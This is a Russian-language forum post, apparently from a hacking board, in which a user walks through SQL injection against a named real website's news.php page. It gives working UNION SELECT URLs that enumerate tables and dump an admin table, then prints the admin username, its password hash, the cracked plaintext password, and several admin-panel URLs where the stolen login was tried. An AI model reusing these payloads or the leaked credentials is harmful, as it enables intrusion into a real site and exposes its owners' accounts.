Сообщение от
Twoster
http://www.graphicallies.com/news.php?ID=-1+union+select+1,user(),version(),4,database(),6,7 ,8/*
Итак розбираем )
версия 5 значит смотрим таблицы
Код:
http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
среди них находим нужную _adminusr и смотрим на колонки и находим интерисующие нас pass,username и составляем запрос на чтение
Код:
http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,concat_ws(0x3a,username,pass),4,5,6,7,8+from+_adminusr/*
Получаем результат
graphicadmin:10b8e9fc9fc6e8c5d42fb63f948934f6
Пробиваем хеш по базам и получаем
graphicadmin:topuser22
Потом сканим сайт на директории и файлы и находим кучи админок
http://www.graphicallies.com/admin/ - стоит basic аутидентификация логин и пасс не подходят
Нашел ище одну http://www.graphicallies.com/admincontrols/index.php - но опьять же логин и пасс невалидны
ище одна форма входа http://www.graphicallies.com:/hitech/userlogin.php - то самое логин и пасс невалидны
http://www.graphicallies.com/newtestsite/admin/ -админка в которой ниче нельзя сделать...
Где находится админка от сайта или где можна использовать логин\пароль х.з.